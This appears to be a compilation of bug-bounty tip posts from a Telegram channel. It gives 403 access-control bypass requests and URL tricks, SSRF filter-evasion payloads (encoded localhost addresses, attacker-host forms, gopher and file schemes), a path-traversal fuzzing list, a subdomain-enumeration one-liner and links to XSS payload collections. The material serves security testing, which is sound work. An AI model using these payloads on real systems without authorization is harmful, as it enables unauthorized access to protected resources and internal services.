Security Hardening Guides🌵

Collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.

Link :🔗
https://github.com/decalage2/awesome-security-hardening

Join Group For More:
https://t.me/bugbountyresources

#cybersecurity #hacking #bugbounty #bugbountytips #infosec

🎆Bypass 403🎆 #bugbountytips

🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: http://target.com


Try this to bypass with
. . .
GET /anything HTTP/1.1
Host: http://target.com

X-Original-URL: /admin

🏹Appending %2e after the first slash
. . .
Request :
http://target.com/admin
=> 403

Try to Bypass with
. . .
http://target.com/%2e/admin
=> 200

🏹Try add dot (.) slash (/) and semicolon (;) in the URL
. . .
http://target.com/admin
=> 403

Try to Bypass with
. . .
http://target.com/secret/
. => 200
http://target.com//secret//
=> 200
http://target.com/./secret/
.. => 200
http://target.com/;/secret
=> 200
http://target.com//;//secret
=> 200

🏹Add "..;/" after the directory name
. . .
http://target.com/admin
=> 403

Try this to bypass using ..;/
http://target.com/admin..;/
=> 200

🏹Try to uppercase the alphabet in the url
. . .
http://target.com/admin
=> 403

Try with UPPERCASE :
http://target.com/aDmIN
=> 200

🏹Via Web Cache Poisoning
. . .

GET /anything HTTP/1.1
Host: http://victim.com

X­-Original-­URL: /admin

Bug Bounty Tools List #bugbounty #cybersecurity #infosec

Server Side Request Forgery(SSRF) #bugbounty #bugbountytips #infosec #cybersecurity

🏹Use The Whole IP Range For Testing SSRF (198.0.0.1-255)

🏹use Different Encoding Schemes of https://127.O.O.1
▪ Hex Encoding https://Ox7f.OxO.OxO.Ox1
▪ Octal Encoding https://0177.O.O.01
▪ Dword Encoding https://2130706433
▪ URL Encoding https://%6c%6f%63%61%6c%68%6f%73%74
▪ Mixed Encoding https://0177.O.O.Ox1
Also use 2130706433 or 0177øWWB1
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)

🏹Use Registered Domain Names That Resolves To 127.0.0.1

🏹Embed Credentials : https://attacker@victim.com

🏹use URL Fragments '#' : https://attacker'#'victim.com (Remome the " over the hash)

🏹Use DNS Subdomain Method : https://victim.com.evil.com

🏹Use Directory Method : https://attacker.com/victim.com

🏹Exploit Redirecting The Target

🏹Change The Referrer To Burp Collaborator [Blind Exploit)

🏹Use IPv6 addresses instead of IPv4

🏹Usable Protocols:
▪gopher : //
▪file: //
▪dict://

Find Subdomain from VirusTotal🔥
Bash One-liner 🌵#bugbountytips #infosec #bugbounty

curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Web Application Security Mindmap🌱🔥

Download : 🌵
https://mindmeister.com/49183531/web-application-security?fullscreen=1

#bugbounty #bugbountytips #infosec

🌱 🔥 🌵 SMB Enumeration 🌵 🔥 🌱

Categorized Web Application Testing🔥🤩

Download : https://2003700811-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M5x1LJiRQvXWpt04_ee%2F-M92gvt7GZ7vaA44ecsQ%2F-M92pwKmnNGTNqUWA0Fd%2Fy7ipicwvp5d41%5B1%5D.png?alt=media&token=155127c6-f54c-464d-9b78-ed90f7070e03

#bugbounty #infosec #cybersecurity

HTTP Status Code Cheat Sheet 🔥🌵

#bugbounty #infosec

🔥🌵😲8000+ Xss Payloads🌵😲🔥
#bugbounty #infosec

Git ripo : https://github.com/Aacle/xss_payload

#bugbounty #infosec

Web Cache Poisoning🌱🌵🔥
#bugbounty #infosec

The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.

Where to find 🧵(1/n) :👇 Complete Thread

https://twitter.com/Aacle_/status/1588199064780537856?s=20&t=G9tW-LmTpkn9SteflrprpQ

File upload cheatsheet🌵

Download :
https://2003700811-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M5x1LJiRQvXWpt04_ee%2F-Mc98SRU_YMf-VQ6QyjW%2F-Mc98XubnHvMuxmO__Gd%2Fimage.png?alt=media&token=53e73826-afd2-4d89-aeeb-d7848266d9f1


#bugbounty #infosec #hacking

6 Bugbounty Tips 😀🤩 from @EdOverflow

#infosec #bugbountytip ☝🏻

secondary context fuzzing: 🌵#bugbounty #infosec
/..%2f
/..;/
/../
/..%00/
/..%0d/
/..%5c
/..\
/..%ff/
/%2e%2e%2f
/.%2e/
/%3f (?)
/%26 (&)
/%23 (#)

via https://samcurry.net/hacking-starbucks/

100 million😲 sbux accounts disclosure
see also: https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8

Guidance for beginners in bug bounty🌱🌵
by @LucianNitescu

Link:
https://drive.google.com/file/d/1CmhAL3XxHYfFMaRGaL7ooJ5gkQ_lg5XO/view

#bugbounty #infosec #hacking

Introducing 20 web-application hacking tools🔥🤩🌵

1. Burp Suite - Framework.

2. ZAP Proxy - Framework.

3. Dirsearch - HTTP bruteforcing.

4. Nmap - Port scanning.

5. Sublist3r - Subdomain discovery.

6. Amass - Subdomain discovery.

7. SQLmap - SQLi exploitation.

8. Metasploit - Framework.

9. WPscan - WordPress exploitation.

10. Nikto - Webserver scanning.

11. HTTPX - HTTP probing.

12. Nuclei - YAML based template scanning.

13. FFUF - HTTP probing.

14. Subfinder - Subdomain discovery.

15. Masscan - Mass IP and port scanner.

16. Lazy Recon - Subdomain discovery.

17. XSS Hunter - Blind XSS discovery.

18. Aquatone - HTTP based recon.

19. LinkFinder - Endpoint discovery through JS files.

20. JS-Scan - Endpoint discovery through JS files.


#bugbounty #bugbountytips #cybersecurity